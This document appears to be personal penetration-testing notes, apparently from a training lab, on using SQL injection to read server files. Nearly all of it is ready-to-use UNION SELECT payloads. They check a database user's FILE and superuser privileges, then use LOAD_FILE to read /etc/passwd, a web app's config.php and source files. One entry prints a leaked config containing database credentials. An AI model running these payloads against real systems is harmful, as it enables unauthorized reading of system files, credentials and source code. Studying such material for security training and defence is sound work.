SQLI READING FILES
IOF the DB user to load and read a file's content, the DB user must have the FILE privileges
IDENTIFYING DB USER FILE PRIVILEGES
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
* can add a filter WHERE user="root" to only show privileges for the current user named root
* Y, means YES, indicating superuser privileges
* ALT: cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
- this cmd displays all of the possible privileges directly from the schema that is given to the current user
- the FILE privilege is the most important as it enables the attacker to read local system files and potentially even write filesREADING LOCAL SYSTEM FILES
#passwd file
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
* this cmd will read the contents of the passwd file through the SQL injection
* this method can also be used to potentially leak the application source code as well.
#reading the configuration file
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
* 'localhost', 'DB_USERNAME'=>'root', 'DB_PASSWORD'=>'dB_pAssw0rd_iS_flag!', 'DB_DATABASE'=>'ilfreight' ); $conn = mysqli_connect($config['DB_HOST'], $config['DB_USERNAME'], $config['DB_PASSWORD'], $config['DB_DATABASE']); if (mysqli_connect_errno($conn)) { echo "Failed connecting. " . mysqli_connect_error() . ""; } ?>
#reading source code file
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
CTRL + U
* to read the source code which may contain sensitive information like database
connection credentials or more vulnerabilities
* the default Apache webroot is /var/www/html and the vulnerable page identified is
search.php located at /var/www/html/search.phpLast updated